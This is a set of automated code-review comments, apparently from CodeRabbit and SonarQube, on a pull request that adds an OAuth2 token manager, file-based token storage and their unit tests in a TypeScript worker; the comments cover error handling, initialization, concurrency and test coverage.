• workers/main/src/services/OAuth2/OAuth2TokenManager.storage.test.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1 hunks)
• workers/main/src/services/OAuth2/constants.ts (1 hunks)

✅ Files skipped from review due to trivial changes (1)

• workers/main/src/services/OAuth2/constants.ts

🚧 Files skipped from review as they are similar to previous changes (3)

• workers/main/src/services/OAuth2/OAuth2TokenManager.errors.test.ts
• workers/main/src/services/OAuth2/OAuth2TokenManager.storage.test.ts
• workers/main/src/services/OAuth2/OAuth2TokenManager.basic.test.ts

🧰 Additional context used

🧠 Learnings (2)

📓 Common learnings

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

📚 Learning: user anatolyshipitz prefers to keep code implementations simple during early development stages rath...

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

Applied to files:

• workers/main/src/services/OAuth2/OAuth2TokenManager.ts

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

🔇 Additional comments (3)

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (3)

30-58: LGTM! Core token management methods are well-implemented.

The token validity logic is comprehensive, including checks for null values, empty strings, and expiry. The non-null assertion in getAccessToken is safe due to the preceding validity check.

---

115-126: LGTM! Token clearing logic is comprehensive.

The method properly clears all token state including the refresh promise, and the error handling has been appropriately improved to throw specific errors instead of silent failures.

---

160-162: LGTM! Testing method is appropriately designed.

The setTokenDataForTesting method provides clean test access to internal state without exposing unnecessary implementation details.

[coderabbitai]

Actionable comments posted: 0

♻️ Duplicate comments (1)

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1)

140-148: Fragile error handling still relies on message text.

The error handling continues to check for 'invalid or expired' in the error message, making it brittle and dependent on specific error message formatting from the refresh provider.

🧹 Nitpick comments (2)

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (2)

22-28: Consider async initialization pattern for token loading.

Calling loadTokens() synchronously in the constructor can cause issues if token loading fails, as constructors cannot be made async. Consider implementing an async initialize() method that must be called after construction.

 constructor(serviceName: string, defaultRefreshToken: string) {
   this.storage = new FileTokenStorage(serviceName);
   this.refreshProvider = new OAuth2TokenRefreshProvider();
   this.defaultRefreshToken = defaultRefreshToken;
-
-  this.loadTokens();
 }

+async initialize(): Promise<void> {
+  await this.loadTokens();
+}

---

200-211: Consider adding runtime guard for testing method.

The testing method bypasses validation and could be dangerous if accidentally used in production. Consider adding a runtime environment check or making it conditional on a test flag.

 setTokenDataForTesting(tokenData: TokenData): void {
+   if (process.env.NODE_ENV === 'production') {
+     throw new Error('setTokenDataForTesting is not available in production');
+   }
   if (tokenData) {
     this.accessToken = tokenData.access_token;
     this.refreshToken = tokenData.refresh_token;
     this.tokenExpiry = new Date(tokenData.expires_at);
   } else {
     this.accessToken = null;
     this.refreshToken = null;
     this.tokenExpiry = null;
   }
 }

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between e356bd6 and 449abb4.

📒 Files selected for processing (4)

• workers/main/src/services/OAuth2/FileTokenStorage.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.ts (1 hunks)
• workers/main/src/services/OAuth2/types.ts (1 hunks)

🚧 Files skipped from review as they are similar to previous changes (3)

• workers/main/src/services/OAuth2/types.ts
• workers/main/src/services/OAuth2/FileTokenStorage.ts
• workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.ts

🧰 Additional context used

🧠 Learnings (2)

📓 Common learnings

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

📚 Learning: user anatolyshipitz prefers to keep code implementations simple during early development stages rath...

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

Applied to files:

• workers/main/src/services/OAuth2/OAuth2TokenManager.ts

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

🔇 Additional comments (5)

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (5)

1-21: Well-structured class definition with proper dependency management.

The imports are clean, and the class follows good practices with private state management and dependency injection.

---

30-58: Public API methods are well-implemented.

The token management logic is sound with proper validation, refresh handling, and fallback mechanisms.

---

60-110: Comprehensive token validation with proper error handling.

The token loading and validation logic is thorough and appropriate for security-critical OAuth token handling. The improved error handling addresses previous concerns.

---

151-162: Storage clearing logic is properly implemented.

The method correctly resets all token state and includes appropriate error handling for storage operations.

---

164-198: Helper methods are well-designed with proper validation.

The buffer calculation, token data validation, and storage operations are correctly implemented with appropriate safeguards.

[coderabbitai]

Actionable comments posted: 1

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 7092850 and cf78db5.

📒 Files selected for processing (5)

• workers/main/src/common/errors/OAuth2Error.test.ts (1 hunks)
• workers/main/src/common/errors/OAuth2Error.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.ts (1 hunks)
• workers/main/src/services/OAuth2/constants.ts (1 hunks)

🚧 Files skipped from review as they are similar to previous changes (3)

• workers/main/src/common/errors/OAuth2Error.ts
• workers/main/src/services/OAuth2/constants.ts
• workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.ts

🧰 Additional context used

🧠 Learnings (3)

📓 Common learnings

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#78
File: workers/main/src/services/OAuth2/OAuth2TokenManager.ts:0-0
Timestamp: 2025-08-01T13:15:19.633Z
Learning: In workers/main/src/services/OAuth2/OAuth2TokenManager.ts, the user anatolyshipitz enhanced the OAuth2Error class with error code functionality, including a code property and ERROR_CODES constants. The OAuth2TokenRefreshProvider now throws typed errors with specific codes, and the OAuth2TokenManager uses these codes for conditional error handling instead of checking message text.

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

📚 Learning: in workers/main/src/services/oauth2/oauth2tokenmanager.ts, the user anatolyshipitz enhanced the oaut...

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#78
File: workers/main/src/services/OAuth2/OAuth2TokenManager.ts:0-0
Timestamp: 2025-08-01T13:15:19.633Z
Learning: In workers/main/src/services/OAuth2/OAuth2TokenManager.ts, the user anatolyshipitz enhanced the OAuth2Error class with error code functionality, including a code property and ERROR_CODES constants. The OAuth2TokenRefreshProvider now throws typed errors with specific codes, and the OAuth2TokenManager uses these codes for conditional error handling instead of checking message text.

Applied to files:

• workers/main/src/common/errors/OAuth2Error.test.ts
• workers/main/src/services/OAuth2/OAuth2TokenManager.ts

📚 Learning: user anatolyshipitz prefers to keep code implementations simple during early development stages rath...

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

Applied to files:

• workers/main/src/services/OAuth2/OAuth2TokenManager.ts

🧬 Code Graph Analysis (2)

workers/main/src/common/errors/OAuth2Error.test.ts (1)

workers/main/src/common/errors/OAuth2Error.ts (1)

• OAuth2Error (3-10)

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (5)

workers/main/src/services/OAuth2/types.ts (4)

• OAuth2TokenManagerInterface (27-33)
• TokenStorageProvider (15-21)
• TokenRefreshProvider (23-25)
• TokenData (8-13)

workers/main/src/services/OAuth2/FileTokenStorage.ts (1)

• FileTokenStorage (8-72)

workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.ts (1)

• OAuth2TokenRefreshProvider (9-93)

workers/main/src/common/errors/OAuth2Error.ts (1)

• OAuth2Error (3-10)

workers/main/src/services/OAuth2/constants.ts (3)

• ERROR_MESSAGES (9-16)
• ERROR_CODES (18-27)
• TOKEN_CONFIG (1-7)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

🔇 Additional comments (12)

workers/main/src/common/errors/OAuth2Error.test.ts (1)

1-21: LGTM! Comprehensive test coverage for OAuth2Error class.

The test suite properly validates both the default and custom error code scenarios. The test structure follows established patterns in the codebase and covers all essential properties of the OAuth2Error class.

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (11)

1-11: Clean imports and good separation of concerns.

The imports are well-organized, pulling in error handling, configuration constants, storage, and refresh provider components. The separation between interfaces and concrete implementations follows good design principles.

---

12-26: Solid class structure with proper dependency injection.

The class properly implements the interface and uses dependency injection for storage and refresh providers. The constructor parameters allow for flexibility while maintaining sensible defaults.

---

32-46: Robust token retrieval with proper error handling.

The getAccessToken method includes proper initialization, validation, and refresh logic. The double-check for token availability after refresh ensures reliability.

---

48-50: Good fallback mechanism for refresh token.

The null coalescing operator provides a clean fallback to the default refresh token when no stored token is available.

---

52-62: Comprehensive token validation logic.

The validation checks for token presence, non-empty strings, and expiry time. The logic is thorough and handles edge cases well.

---

71-73: Improved error handling addresses previous concerns.

The empty catch block issue from previous reviews has been properly addressed by throwing a specific OAuth2Error with an appropriate error message.

---

80-114: Thorough token data validation with comprehensive checks.

The isValidTokenData method includes extensive validation for all token properties, including type checking, length validation, and date validity. This prevents invalid token data from being processed.

---

116-133: Excellent concurrency control implementation.

The refresh mechanism properly prevents concurrent refresh operations using a promise-based approach. The buffer check and cleanup logic in the finally block ensure proper state management.

---

144-152: Enhanced error handling using error codes.

The error handling now uses specific error codes instead of checking message text, addressing the fragile error handling concern from previous reviews. This makes the code more robust and maintainable.

---

163-165: Consistent error handling for storage operations.

The storage clear operation now properly throws specific errors instead of using empty catch blocks, maintaining consistency with the improved error handling approach.

---

179-187: Good validation before setting token data.

The setTokenData method includes proper validation before updating internal state, preventing invalid token data from corrupting the manager's state.

[coderabbitai]

Actionable comments posted: 0

🧹 Nitpick comments (2)

workers/main/src/services/OAuth2/FileTokenStorage.load.test.ts (1)

21-117: Consider adding JSON parsing error test scenario.

The test suite provides excellent coverage of the load functionality. Consider adding one more test case for malformed JSON that would cause JSON.parse() to throw a SyntaxError:

+    it('should return null when JSON is malformed', async () => {
+      mockReadFile.mockResolvedValue('{ invalid json');
+
+      const result = await fileTokenStorage.load();
+
+      expect(result).toBeNull();
+    });

This would ensure the implementation handles JSON parsing errors gracefully.

workers/main/src/services/OAuth2/FileTokenStorage.basic.test.ts (1)

43-62: Comprehensive constructor testing.

The tests cover all constructor scenarios: default service name, custom service name, and custom token file path. However, the tests only verify instance creation but don't validate the internal state or configuration.

Consider adding assertions to verify that the constructor parameters are properly stored internally, if the class exposes any getters or properties for validation:

 it('should create instance with custom service name', () => {
   const storage = new FileTokenStorage('custom-service');
   
   expect(storage).toBeInstanceOf(FileTokenStorage);
+  // If FileTokenStorage exposes serviceName property:
+  // expect(storage.serviceName).toBe('custom-service');
 });

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between cf78db5 and 6379c43.

📒 Files selected for processing (5)

• workers/main/src/services/OAuth2/FileTokenStorage.basic.test.ts (1 hunks)
• workers/main/src/services/OAuth2/FileTokenStorage.clear.test.ts (1 hunks)
• workers/main/src/services/OAuth2/FileTokenStorage.load.test.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.test.ts (1 hunks)

✅ Files skipped from review due to trivial changes (1)

• workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.test.ts

🚧 Files skipped from review as they are similar to previous changes (1)

• workers/main/src/services/OAuth2/OAuth2TokenManager.ts

🧰 Additional context used

🧠 Learnings (2)

📓 Common learnings

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#78
File: workers/main/src/services/OAuth2/OAuth2TokenManager.ts:0-0
Timestamp: 2025-08-01T13:15:19.633Z
Learning: In workers/main/src/services/OAuth2/OAuth2TokenManager.ts, the user anatolyshipitz enhanced the OAuth2Error class with error code functionality, including a code property and ERROR_CODES constants. The OAuth2TokenRefreshProvider now throws typed errors with specific codes, and the OAuth2TokenManager uses these codes for conditional error handling instead of checking message text.

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

📚 Learning: in workers/main/src/services/oauth2/oauth2tokenmanager.ts, the user anatolyshipitz enhanced the oaut...

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#78
File: workers/main/src/services/OAuth2/OAuth2TokenManager.ts:0-0
Timestamp: 2025-08-01T13:15:19.633Z
Learning: In workers/main/src/services/OAuth2/OAuth2TokenManager.ts, the user anatolyshipitz enhanced the OAuth2Error class with error code functionality, including a code property and ERROR_CODES constants. The OAuth2TokenRefreshProvider now throws typed errors with specific codes, and the OAuth2TokenManager uses these codes for conditional error handling instead of checking message text.

Applied to files:

• workers/main/src/services/OAuth2/FileTokenStorage.clear.test.ts
• workers/main/src/services/OAuth2/FileTokenStorage.load.test.ts
• workers/main/src/services/OAuth2/FileTokenStorage.basic.test.ts

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

🔇 Additional comments (16)

workers/main/src/services/OAuth2/FileTokenStorage.clear.test.ts (4)

1-19: LGTM! Well-structured imports and comprehensive mocking.

The imports are properly organized and the mock setup covers all necessary filesystem operations. The OAuth2Error import aligns with the enhanced error handling mentioned in the retrieved learnings.

---

21-38: LGTM! Proper test setup with good isolation.

The beforeEach/afterEach pattern ensures proper mock initialization and cleanup between tests. The default mock behaviors are sensible and the test isolation is well-implemented.

---

41-45: LGTM! Clean happy path test.

The test properly verifies that the clear method calls unlink with the expected file path. Simple and focused validation.

---

47-63: LGTM! Comprehensive error handling tests.

Both error scenarios are well-tested:

• ENOENT handling correctly doesn't throw (appropriate for idempotent clear operation)
• Other errors are properly wrapped in OAuth2Error with descriptive messages
• Async error handling patterns are correctly implemented

The OAuth2Error usage aligns with the enhanced error handling mentioned in the retrieved learnings.

workers/main/src/services/OAuth2/FileTokenStorage.load.test.ts (5)

1-20: LGTM! Well-structured imports and comprehensive mocking setup.

The imports are clean and focused, and the mock configuration properly covers all filesystem operations that the FileTokenStorage class would need.

---

21-46: LGTM! Proper test setup with clean mock management.

The test setup follows best practices with proper mock typing, realistic test data, and clean isolation between tests using beforeEach/afterEach hooks.

---

47-56: LGTM! Comprehensive success scenario test.

The test properly validates the happy path, ensuring the file is read with correct parameters and valid token data is returned as expected.

---

58-67: LGTM! Proper handling of file not found scenario.

The test correctly simulates the ENOENT error case and validates that null is returned when the token file doesn't exist, which is appropriate behavior.

---

69-116: LGTM! Comprehensive error scenario coverage.

These test cases thoroughly cover all failure modes: generic file read errors, invalid token data structures, missing required fields, null data, and non-object data. The consistent null return behavior for all error scenarios is appropriate.

workers/main/src/services/OAuth2/FileTokenStorage.basic.test.ts (7)

1-7: LGTM! Clean import structure and proper type imports.

The imports are well-organized, importing necessary testing utilities, error classes, and types. Good separation of concerns with proper relative imports.

---

8-15: Comprehensive fs module mocking setup.

The mock configuration properly covers all the fs.promises methods that the FileTokenStorage class would need (mkdir, writeFile, readFile, unlink). This ensures complete isolation during testing.

---

22-27: Well-structured mock token data.

The mock token data includes all required fields with realistic values. The expires_at timestamp is properly set to a future time (1 hour from now) which is appropriate for testing.

---

29-37: Proper mock setup in beforeEach hook.

Good practice using vi.mocked() to get properly typed mock functions and setting up default resolved values. The test instance is created with a clear service name for testing.

---

39-41: Clean mock cleanup in afterEach.

Proper cleanup using vi.clearAllMocks() ensures test isolation between test cases.

---

64-75: Effective save method success test.

The test properly verifies that both mkdir and writeFile are called with appropriate parameters. Using expect.any(String) for paths is good practice since the exact paths may be implementation details.

---

77-97: Thorough error‐handling tests for FileTokenStorage.save
The tests cover both writeFile and mkdir failures, asserting that save() rejects with an OAuth2Error and the expected message. Since FileTokenStorage currently throws new OAuth2Error('…') without a custom code (it defaults to "UNKNOWN_OAUTH2_ERROR"), there’s no need to assert on error.code today. If you introduce specific error codes for these failures in the future, please update the tests to verify error.code against the new constants.

[sonarqubecloud]

Quality Gate failed

Failed conditions
71.4% Coverage on New Code (required ≥ 80%)

See analysis details on SonarQube Cloud

[coderabbitai]

Actionable comments posted: 0

🧹 Nitpick comments (1)

workers/main/src/services/OAuth2/OAuth2TokenManager.basic.test.ts (1)

37-40: Consider clarifying the async initialization pattern.

The setTimeout(resolve, 0) suggests the OAuth2TokenManager constructor has async initialization. Consider adding a comment explaining why this is needed, or verify if there's a more explicit way to wait for initialization completion.

  beforeEach(async () => {
    tokenManager = new OAuth2TokenManager('qbo', 'test-refresh-token');
+   // Wait for async initialization to complete
    await new Promise((resolve) => setTimeout(resolve, 0));
  });

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between f6845a9 and 3abdcc5.

📒 Files selected for processing (2)

• workers/main/src/services/OAuth2/OAuth2TokenManager.basic.test.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.storage.test.ts (1 hunks)

🧰 Additional context used

🧠 Learnings (3)

📓 Common learnings

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#78
File: workers/main/src/services/OAuth2/OAuth2TokenManager.ts:0-0
Timestamp: 2025-08-01T13:15:19.633Z
Learning: In workers/main/src/services/OAuth2/OAuth2TokenManager.ts, the user anatolyshipitz enhanced the OAuth2Error class with error code functionality, including a code property and ERROR_CODES constants. The OAuth2TokenRefreshProvider now throws typed errors with specific codes, and the OAuth2TokenManager uses these codes for conditional error handling instead of checking message text.

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

📚 Learning: in workers/main/src/services/oauth2/oauth2tokenmanager.ts, the user anatolyshipitz enhanced the oaut...

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#78
File: workers/main/src/services/OAuth2/OAuth2TokenManager.ts:0-0
Timestamp: 2025-08-01T13:15:19.633Z
Learning: In workers/main/src/services/OAuth2/OAuth2TokenManager.ts, the user anatolyshipitz enhanced the OAuth2Error class with error code functionality, including a code property and ERROR_CODES constants. The OAuth2TokenRefreshProvider now throws typed errors with specific codes, and the OAuth2TokenManager uses these codes for conditional error handling instead of checking message text.

Applied to files:

• workers/main/src/services/OAuth2/OAuth2TokenManager.storage.test.ts
• workers/main/src/services/OAuth2/OAuth2TokenManager.basic.test.ts

📚 Learning: user anatolyshipitz prefers to keep code implementations simple during early development stages rath...

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

Applied to files:

• workers/main/src/services/OAuth2/OAuth2TokenManager.storage.test.ts

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

🔇 Additional comments (8)

workers/main/src/services/OAuth2/OAuth2TokenManager.basic.test.ts (3)

1-32: LGTM! Comprehensive mock setup.

The imports and mock configurations are well-structured. The mocks provide realistic return values and proper async/Promise handling for all dependencies.

---

46-106: LGTM! Comprehensive basic functionality coverage.

The tests effectively cover the core OAuth2TokenManager functionality including token validation, refresh token retrieval, and access token retrieval scenarios. The test data structures are realistic and the assertions are appropriate.

---

163-175: LGTM! Good buffer time edge case coverage.

This test verifies that tokens within the buffer time (10 minutes) are still considered valid and don't trigger unnecessary refresh. This is important for performance optimization and avoiding excessive API calls.

workers/main/src/services/OAuth2/OAuth2TokenManager.storage.test.ts (5)

1-32: LGTM! Consistent mock setup.

The mock configuration is identical to the basic test file, ensuring consistent testing environment across the test suite.

---

46-49: LGTM! Proper initialization testing.

This test correctly verifies that the OAuth2TokenManager loads tokens from storage during initialization and handles the case where no valid stored tokens exist.

---

63-73: Good coverage of null value edge cases.

Testing null access_token with type assertion is valuable for runtime robustness, ensuring the implementation handles unexpected data types gracefully.

---

129-150: Excellent concurrency testing!

This test is crucial for verifying that multiple simultaneous requests for access tokens don't trigger multiple refresh operations. The test correctly verifies that all concurrent requests resolve to the same refreshed token, preventing race conditions and unnecessary API calls.

---

152-160: Good edge case coverage for testing utilities.

Testing that setTokenDataForTesting handles null and undefined values gracefully ensures the testing utility is robust and doesn't introduce false positives in the test suite.